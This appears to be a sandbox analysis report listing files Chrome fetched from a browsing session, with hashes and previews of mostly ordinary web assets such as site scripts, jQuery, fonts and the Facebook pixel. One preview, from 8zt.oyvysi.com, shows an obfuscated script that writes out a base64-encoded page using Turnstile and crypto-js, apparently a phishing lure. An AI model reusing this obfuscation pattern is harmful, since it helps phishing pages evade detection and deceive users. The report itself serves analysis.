                                                                                                          Preview:function _typeof(t){"@babel/helpers - typeof";if(typeof Symbol==="function"&&typeof Symbol.iterator==="symbol"){_typeof=function t(n){return typeof n}}else{_typeof=function t(n){return n&&typeof Symbol==="function"&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n}}return _typeof(t)}var Lass=window.Lass||{};void function(){var f=this.util=this.util||{};f.type=function(t){var n,e=/\{\s*\[native\s*code\]\s*\}/i;null===t?n="null":"undefined"===typeof t?n="undefined":(n=Object.prototype.toString.call(t).match(/\w+/g)[1].toLowerCase(),"object"===n&&e.test(t+"")&&(n="function"));return n};f.trim=function(t){return(t+"").replace(/^[\s\u00A0]+|[\s\u00A0]+$/g,"")};f.extend=function(){var t=arguments.callee,n,e;"object"!==f.type(arguments[0])?(n=1,e=!!arguments[0]):(n=0,e=!1);var i=arguments[n]||{};n=[].slice.call(arguments,n+1);for(var o,r;n.length;){if(o=n.shift(),"object"===f.type(o)){var s,c;for(c in o){if(s=o[c],"object"===f.type(s)){if(s==window||s==document||"childNodes"in s
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (22045)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):22136
                                                                                                          Entropy (8bit):5.199868521451292
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E91997C81276018291B581AA705BB018
                                                                                                          SHA1:87B375AD4A12310DE21DCDD3CFDD3189E386D9D1
                                                                                                          SHA-256:A3B0C953C1FCB4BA27D59F0CC1EF1F5E570BFD7C90997831EF58405CE7E8BD57
                                                                                                          SHA-512:00B9ED716D093CEA2FA9055E5826CE53E32B7D00E314615ECE96B75A0812A4029CF16BBB668B6AF65FD5E39531D3C6A402CCBE1362438B7D383F064FF9EE461D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/libs/faw/faw.1.2.3.js?r=1727402485614
                                                                                                          Preview:function _typeof(e){"@babel/helpers - typeof";return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}!function(){function y(){var o,e=this.config,r=e.buried_point.module_tag,i=e.buried_point.item_click_tag,l=e.buried_point.custom_property_parse[i],u=e.buried_point.faw_id;function a(e,t){o=null;var n={},a=faw.parentNodeWithAttr(e,i);e&&a&&1===e.nodeType&&((o=a.getAttribute(u))&&faw.proxy.list[o+"_click"]||(o||(o=faw.generateID(),a.setAttribute(u,o)),e=faw.parentNodeWithAttr(e,r),n=faw.assign(n,c,{target:a,moduleDom:e,moduleData:faw.assign({faw_id:o},t)}),e&&(n.moduleName=e.getAttribute(r)),faw.proxy.on(o+"_click",l,n)),faw.proxy.fire(o+"_click",{moduleData:t||{}}))}l?(faw.addEventListener("click",document,function(e){var t=faw.parentWrap(e.target,"a");if(a(e.target),t){var n=faw.pageStorage(),e="";try{e=n.pgcnt.pv_id
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (6369), with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):17732
                                                                                                          Entropy (8bit):5.9073253743844205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:77309C88C64418C650F3F07674F88B6B
                                                                                                          SHA1:3C37BE61EF041FFF293E019552D5D9B4021994DE
                                                                                                          SHA-256:342494F743654A241A93E30AC6BBE75B76A6DAA47B62F3D1F1C4B33F6DDEB568
                                                                                                          SHA-512:DBC8A7526A5155A09D30F94D9BAB629987499C6347FFC3E6AE91186F3D784D555E55ACBF72FD5D8DC29FD35E1155A6613389F9EBB765B9BFE6B7F35B5B0375EE
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://8zt.oyvysi.com/h2b7AtfcCPBLraDgEbdA/
                                                                                                          Preview: Don&#039;t be distracted by criticism. Remember, the only taste of success some people get is to take a bite out of you. -->.. Stop chasing the money and start chasing the passion. -->..<script>....if(atob("aHR0cHM6Ly84enQub3l2eXNpLmNvbS9oMmI3QXRmY0NQQkxyYURnRWJkQS8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIG
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41214)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42755
                                                                                                          Entropy (8bit):5.657620619339792
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:388465FC741F00D6BD83713BB69A95E0
                                                                                                          SHA1:E3235CD6487A3D46EAB8EC1E2D9CEB2CC373AAAB
                                                                                                          SHA-256:9C2D244F088C59B95ADDBF0B27632DF867E182C064EC8C5C8680FF86A682CABB
                                                                                                          SHA-512:64DB405E2B06F2D07D406D04A13F605B0186A822413745E3D80D5395A86F740254B8866B74BD0859321054F3362DA50883A31B68578709B8B0271863B2F78FB6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:function _typeof(e){"@babel/helpers - typeof";return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}function ownKeys(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);e&&(i=i.filter(function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable})),n.push.apply(n,i)}return n}function _objectSpread(t){for(var e=1;e<arguments.length;e++){var n=null!=arguments[e]?arguments[e]:{};e%2?ownKeys(Object(n),!0).forEach(function(e){_defineProperty(t,e,n[e])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(n)):ownKeys(Object(n)).forEach(function(e){Object.defineProperty(t,e,Object.getOwnPropertyDescriptor(n,e))})}return t}function _defineProperty(e,t,n){t=_toPropertyKey(t);if(t in e){Object.defineProperty(e,t,{value:n,enumerable:true
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):97
                                                                                                          Entropy (8bit):4.768482527839247
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:A366E7E5327A06F09555B69BFD21A916
                                                                                                          SHA1:41BA51987AD3F190AA18CAF8073D4B353CD410CB
                                                                                                          SHA-256:92D905110D030C343AE4D5002E147A6FEE15BE6F25191E67E1845F157580E41E
                                                                                                          SHA-512:B9364EB71C090D0A29171E109799BA1CD885860701A4E6AA43DD64E8AC132C0F9D1A1C4DB6F0A39666B35164E18407F3B1842E74FD3B720CA54BF8328ACF36BF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://membercenter.made-in-china.com/tm.do?xcase=tmRightsCheck&callback=jQuery171011472336792384019_1728320966249&_=1728320971544
                                                                                                          Preview:jQuery171011472336792384019_1728320966249({"ip":"0","tm":"true","login":"false","visitorId":""});
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2377)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2457
                                                                                                          Entropy (8bit):5.161529650317837
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0B9F519C09F6985E3D0FA9546098CCA9
                                                                                                          SHA1:CABAB731CE9B1BB613D13360A76A7223528E2729
                                                                                                          SHA-256:A8F0384566FE8520C8A589D1A656949E04DF79285E486EC98855813523DDAF72
                                                                                                          SHA-512:C562AF88810B9621129A72BA1EA7A3F4A50E6D241B71C99F34DED430247EB57769C058155B9BDA201851174C53FB783072C2CFECDB6AFD07D6629F721369474C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/css/tm/tm_e26ae765.css
                                                                                                          Preview:.tm-status-off,.tm-status-on{display:inline-block!important;*display:inline!important;zoom:1;padding-left:20px;line-height:16px;white-space:nowrap;text-align:left}.tm-status-on{background:url(https://www.micstatic.com/common/img/logo/tm_on_16_8a9a2d8a.png) no-repeat 0 center}@media screen and (-webkit-min-device-pixel-ratio:1.5),screen and (min--moz-device-pixel-ratio:1.5){.tm-status-on{background:url(https://www.micstatic.com/common/img/logo/tm_on_32_b981b1f3.png) no-repeat 0 center;background-size:16px}}.tm-status-on:hover{text-decoration:underline}.tm-status-off{background:url(https://www.micstatic.com/common/img/logo/tm_off_16_2d3f5f04.png) no-repeat 0 center}@media screen and (-webkit-min-device-pixel-ratio:1.5),screen and (min--moz-device-pixel-ratio:1.5){.tm-status-off{background:url(https://www.micstatic.com/common/img/logo/tm_off_32_f4e7fa36.png) no-repeat 0 center;background-size:16px}}.tm-status-off:hover .tm-status-off:visited,.tm-status-off:link{color:#888}.tm-status-off:h
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3218
                                                                                                          Entropy (8bit):7.93164309436451
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:A6E1AEE6F99C8836E6D3528184712C7A
                                                                                                          SHA1:B9F3FB1857613C3059F753E8C9D89AA1E2C7C730
                                                                                                          SHA-256:5D0B26A5456E10317F5200E621F53AD2931AF14A0AA810460453AE7111C056A0
                                                                                                          SHA-512:7502DCC46E6B512A12B4FC2C2AE515F0BBB45155692EF9D0953D7BBF49281549B85806EBE74F1D6D97C39329B9A423891BA118EF271931BA323E8FEC5E85B430
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:RIFF....WEBPVP8 ~........*d.d.>A..D"...Jv.(...._=.6?.4e...n.?..ny......#....oC../...9........._.X.f....<....u.^4.W......s...c...^...}..q./....Z?Fd..<g.4^/.I;...o.Z.....r..b...[.h>..._.?..O0s.8.....t....2.4.G..O/..e..tT. .;....t.........mJ.RrP..j^...Y...(M.p..h-.....y.Ra.A.............!.......'..$ CAf.X[e.........S..ia....C...&....8.z..t.T......|p.......C......a.35.d...r82^..|..`...-w.<\.....O..3..w....&.i...2.N.....-..|........>w...{..A.$\....k2n..'.....Q.......:o..)'.........ZK.d...c.8.T8.......H.O.[.H......q....Y.,y..})=...i.....*..9K.S......9.............k.C6.n.g.!.>.....4T^..x.~X|i.sO.:.A#.o.0...F(.z;.Uo....(F..688.......r..'L..q..........%.q1.W..Sb...........h'.........p......Z...2..:'o..|..xR....%Z.1..Y5pA/.zJ.+O.xu.....Ep.D$S.*.4..bY/.....I;w.#...v......'.-..sH..O.vb......2i...p..l.#ve...V.Jz.......5F..|..P......q.`..xv...S.^h1...S?\.6..x..a....v/S...;..\......p.,.........@J..S~.y0U;w./.)Xv....=2.V.....v..2.^....;J......i3.F...V.F7P...
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65465)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):219035
                                                                                                          Entropy (8bit):5.396707050784101
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:F82F15841F300BE6CA6CCAC91958BEF0
                                                                                                          SHA1:CECB8262D524527AA9295F7BF5E629515F597EED
                                                                                                          SHA-256:411FBE92D05D5477259892C6298B479EB6AA6168DA2CC9B338F24F343F8C9BB3
                                                                                                          SHA-512:5F22E4C4048EC39900106E237B2F6AEC2FBF6BDBD98B614D46BA18BD4EC40613B8906752A8749E7B81CED399A321D882C76AD525DB333B818F56E0AD2D89E404
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://webim.made-in-china.com/super-tm-icon/static/js/icon.df157752.js
                                                                                                          Preview:/*! For license information please see icon.df157752.js.LICENSE.txt */.!function(){var e={609:function(e,n,t){var r=t(70)("jsonp");e.exports=function(e,n,t){"function"==typeof n&&(t=n,n={});n||(n={});var i,l,u=n.prefix||"__jp",s=n.name||u+o++,c=n.param||"callback",f=null!=n.timeout?n.timeout:6e4,d=encodeURIComponent,p=document.getElementsByTagName("script")[0]||document.head;f&&(l=setTimeout((function(){h(),t&&t(new Error("Timeout"))}),f));function h(){i.parentNode&&i.parentNode.removeChild(i),window[s]=a,l&&clearTimeout(l)}return window[s]=function(e){r("jsonp got",e),h(),t&&t(null,e)},e=(e+=(~e.indexOf("?")?"&":"?")+c+"="+d(s)).replace("?&","?"),r('jsonp req "%s"',e),(i=document.createElement("script")).src=e,p.parentNode.insertBefore(i,p),function(){window[s]&&h()}};var o=0;function a(){}},70:function(e,n,t){function r(){var e;try{e=n.storage.debug}catch(t){}return!e&&"undefined"!==typeof process&&"env"in process&&(e={NODE_ENV:"production",PUBLIC_URL:"",WDS_SOCKET_HOST:void 0,WDS_SO
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 14552, version 2.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):14552
                                                                                                          Entropy (8bit):7.9843667044720785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0D7E71F2B5CC1DDAB837F72E1FE52F3F
                                                                                                          SHA1:C4344746896E452E5F4EF45781F622836910AE46
                                                                                                          SHA-256:413A32337B13F4DB78EFA8D6842A3769D28166C156D9D053BF70B472E4A1E41F
                                                                                                          SHA-512:B34543EC505823A28AF551B0C9819A964A2B03A037E5769631BC6FB0A5C32629789DBDF281538792C550C6CF1583480E6B6AC89139C839E834E8A6405E3C1960
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/fontastic/dist/assets/roboto/700-bold/Roboto-Bold_66f23800.woff2
                                                                                                          Preview:wOF2......8...........8u.........................L..N....`..8.B..<.....X..5..h.6.$..v..>.. .... ..".,qU.z.. .....c.......8.d..Lz...=...ZxVb.#..`...;..\....-..a..............6.M..zI...Ccu...>..!.N..!.t..."%.m...j..J.....E..x......3. e"c.).A..yC..{@.B.h..3..PA..D..Q1"g.nfosQ..6..p..:..;......{@.N.......F.g{.h..o.k&;9"......3..C.. S..R.....w..9.}..)M...........R..j...T......{|.3...z.]........8...m..L.!...uBe%`?.T........$Y.#..9..*M.s...s.K.,..eA0.+.5..G..M$...~m..i..V2G....H$........w.$.....}..L..k.j........Y...@.<.]..:E......d^.l/xC..d.-..y....;......:].q.M...S%e......~...+d...a...X_^~|Y...mw=.0.)ue.K:.G...t.....bwA{h......\.."+q?.....N1..]u).vQ..t.'l,.l.h....q....Uc.'...B}3..v.el>..D.....?6.q.rQ.....i]V..`j^.....'H.l(\.PH.PH.PH./!.b.&.`.<....8...pc.' }.}$..8.. ...y....!... ./.-.......".tT.(.....H.*Op;..})mPN..`PK..L.).H..d."].....<...V!L...ni.. 3J..!e..gF.<hd.R..A. .C..C.;.8..4. .c......(.\..y.P.Z...z...o..!g.s..W]s.....v.]..,Z.l.V......d
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 26968, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):26968
                                                                                                          Entropy (8bit):7.992209104287393
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:A9893CBACE7DD5B4B3935522F82373BF
                                                                                                          SHA1:33568AD29631E90681D2305F2C2358A4F2A17937
                                                                                                          SHA-256:6729D8755D8F5CC2DDA98C81B9F9D567027AF5F804B7F7A3D060E1C0E91F48E5
                                                                                                          SHA-512:D61E7F953AFD486D8BD10CF0A4412509447D37483D9206E2E7E2E4EDE73124110F85AE0B2D9F2C493AF2B7107122F8B1878F1274F3F78648482B6DCD86068203
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/fontastic/dist/assets/icon/micon_a1e45220.woff2
                                                                                                          Preview:wOF2......iX......#...h.........................?FFTM....`..v..... ..y.....6.$..". ..3..m.......a.@.Dx....+1+j.f%.../..W....N..q.5 .g.`:...S....g.g,%g`.....%. ..w....v .H.a..!....#.%`."c..Dq.Z...V..(Z..8..U[K....j..T[W......xV.D#....[...E......=n|[..p..."..'.I....../...a......h.g{.u..t....mO..L..x.L.~p`.`..........!.<.9q....X...}./...}...R...=\.hV4..W3...:xC-...."U..Y../.O.#..9n..../.UpL[..55.........Y.k.*0.W.7.....\..=............Wr.q.n0...+"...y....T.....5..9.g5.L>.5............w..... .C.$.....A..B..h.T7......N.uN.u...A..j...Dg.v.x.....6.....8.(. 6Dl.._...pZ..._~M.....X.......cw.dTW....a.>.{.....;..v.........F.uC...&1...._..H...3...+......E#m...Y..L. .."....w...}...?.96..Cx."...T....NN.^..t. {.'..@.N......x.G...{..~........8s.9.\.\.......s=s+.....}..... .c.p.=..oao..vmXq.?(.A..J.....e{........o..1o..C. o.o5..k....(.=....A. ..".M...H..O.w.c.@.....$.vJl{...5..>:.....F...E..F[.(2O.7..0...A;A..\.]....@:....O..>.N..(.] h2l...."..=.P. r'..'.J..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):89501
                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), CFF, length 25424, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):25424
                                                                                                          Entropy (8bit):7.991933253123889
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:18FD121F08442E4699E6B5A066DA64D5
                                                                                                          SHA1:FF8096A89C298AA7626473B8161E16A8036E279D
                                                                                                          SHA-256:ECC5F8D9A28BFB47E2FF5C5F59B1BDF536F27FFEFE6F5A6A2006003E260C2013
                                                                                                          SHA-512:98E83F4E1B7E8F566BC2DA344A062FF4587E8EAB2E3621A514E7E62741D49E7FD2791B3056D043E1E330460A0FF8D28427760D298994EFF98C40C664CCB4D421
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://use.typekit.net/af/31bc1e/00000000000000007735cc6c/30/l?subset_id=2&fvd=n7&v=3
                                                                                                          Preview:wOF2OTTO..cP......{P..b............................T?DYNA.Q.b?GDYN.a..,.`..F.6.$......... .ez....^<...zH.7U...O...._.......R.v..t.......q.~...O...I...R.V....Zh..%.aV../.|..3..^.....i...y4......B].R.H.t.Qa."b..*...zsw......T.5..]d....'...*0...r7+&..`i..*....hGQ\......gf2.."X@@T...........z&.......!$qd].....X..5..1..b....cA`.A.`i..F.=..fj7.m.e.7.;Ds./-d.MB.i..,.r"VQjFM.`)...<...!...$..._..)g&......i.......TI.Y..TTR'.QE%..6._`.HE\O..3@@...........B*.D.4.......YM..=...l.kv.I.....-...s.ee.. .gA:..G.!..7\1UI.....6.c9@\....S.).45S.].....1V.Z3..."..e.:e..".a......Js........~Ma~Me.....M.W..*LFhT.2.!dm.g#.)....1H@..D.(..........~....r.j.).,.S.r.U.+kg5.Y....U.....k...*..,T.2.ES-l+.6..!?.KM..Uc..uJP"..n3.L......g.6.Q.*..er]\7/...;.=._.'...B..I.k.535.5.5/4..(1NL...\.Hl.[.Nq.xT<+!I#..pi..[:!]..Iw.zd]..|F.(.._...0.T..#..DH.*..V.......\....^.`..#q,.......<....&....{.^|...G.Q|...W.U|.../.+...!..G...h...K,..q%....ZRG.I..Nf..d..M....$.C^......5......Z
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (9217)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):231864
                                                                                                          Entropy (8bit):5.458039173946496
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:40283CFC473AFBE1D4ABBA7E6C809885
                                                                                                          SHA1:8A32CB88D9F537B02582DF17A5BB11C2087937F6
                                                                                                          SHA-256:48BA1993011DB4834882D81B2153753437607292F704A6543D4466C0F6D1372A
                                                                                                          SHA-512:DABD9FD4CC3FB4FF3EBC2C3529E602E91939DDB1F42C2D7E70188DFC3262548922EA45C96691D567F2C777D393B5CE7162B5BD4C2054B33A03856BBEA1C1A0E3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):49
                                                                                                          Entropy (8bit):4.581461058746012
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0E86D32EAC8B2476A059E659C631FFC6
                                                                                                          SHA1:7AEE543FFED2749EA63FBFC585CF8E07EB494210
                                                                                                          SHA-256:E6EE5BA337EB4F97AB8510E471A5767519307E025E731CF4D60ADF4AC8C6667C
                                                                                                          SHA-512:BCB70945CC10BCFBC25C50653C16E4F62547997DDDE0A166FCA7A8DABF895E2B61381CF0565854B2412003A659549EF487B753A3499AB6449953759D2F23AFE1
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:jsonp_1728320966211_59179({"type":"1","list":[]})
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (41930)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):45833
                                                                                                          Entropy (8bit):5.084470315069908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:A101791992E6907125C42D96B8E7A792
                                                                                                          SHA1:54FB2AA38C7FAEB4D7C2CD8781316959EDD82DDE
                                                                                                          SHA-256:81F6B23AC2C649AA1D80B6924C68CC7AC831DEE9AFD3D7060447C593BBBF781B
                                                                                                          SHA-512:6720F8139A89AA9D6F8D3B59012CCC1B8B80292DE81D33A9155E43EBB12F5E1A3F3017C776B43BF7FDB9489D03A7F957B6E0E600992817C9B990C64189FF32C4
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(()=>{"use strict";var m={},u={};function c(e){var t=u[e];if(t!==void 0)return t.exports;var a=u[e]={id:e,loaded:!1,exports:{}};return m[e].call(a.exports,a,a.exports,c),a.loaded=!0,a.exports}c.m=m,c.amdO={},(()=>{var e=[];c.O=(t,a,n,s)=>{if(a){s=s||0;for(var f=e.length;f>0&&e[f-1][2]>s;f--)e[f]=e[f-1];e[f]=[a,n,s];return}for(var d=1/0,f=0;f<e.length;f++){for(var[a,n,s]=e[f],i=!0,b=0;b<a.length;b++)(s&!1||d>=s)&&Object.keys(c.O).every(p=>c.O[p](a[b]))?a.splice(b--,1):(i=!1,s<d&&(d=s));if(i){e.splice(f--,1);var r=n();r!==void 0&&(t=r)}}return t}})(),c.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return c.d(t,{a:t}),t},(()=>{var e=Object.getPrototypeOf?a=>Object.getPrototypeOf(a):a=>a.__proto__,t;c.t=function(a,n){if(n&1&&(a=this(a)),n&8||typeof a=="object"&&a&&(n&4&&a.__esModule||n&16&&typeof a.then=="function"))return a;var s=Object.create(null);c.r(s);var f={};t=t||[null,e({}),e([]),e(e)];for(var d=n&2&&a;typeof d=="object"&&!~t.indexOf(d);d=e(d))Object.getOwnPropertyNames(d).forEa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (39694)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):41185
                                                                                                          Entropy (8bit):5.730008975115965
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:7DC427261CB5A727BEF3B80F03C0D7DC
                                                                                                          SHA1:AF9426EB35B5FFBE121401FC360D33CCD53FFD9E
                                                                                                          SHA-256:518471828E42CAA08F24BB0FF0D99926688E2F799D662A4A4E221FC6B9B8EA58
                                                                                                          SHA-512:9140780C26E599E7F8743B4F6F438E639F9679D31D169C0537720F7823751C0A9E00816D002097703EAA3352EE07938423B811A5B983304BEF7824C219C856D5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/business/plugs/sidebar/dist/index_dcf0c3a9.js
                                                                                                          Preview:function _inherits(e,t){if(typeof t!=="function"&&t!==null){throw new TypeError("Super expression must either be null or a function")}e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:true,configurable:true}});Object.defineProperty(e,"prototype",{writable:false});if(t)_setPrototypeOf(e,t)}function _setPrototypeOf(e,t){_setPrototypeOf=Object.setPrototypeOf?Object.setPrototypeOf.bind():function e(t,n){t.__proto__=n;return t};return _setPrototypeOf(e,t)}function _createSuper(a){var r=_isNativeReflectConstruct();return function e(){var t=_getPrototypeOf(a),n;if(r){var i=_getPrototypeOf(this).constructor;n=Reflect.construct(t,arguments,i)}else{n=t.apply(this,arguments)}return _possibleConstructorReturn(this,n)}}function _possibleConstructorReturn(e,t){if(t&&(_typeof(t)==="object"||typeof t==="function")){return t}else if(t!==void 0){throw new TypeError("Derived constructors may only return object or undefined")}return _assertThisInitialized(e)}function _assertThisIniti
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4875), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4875
                                                                                                          Entropy (8bit):5.815865879498543
                                                                                                          Encrypted:false
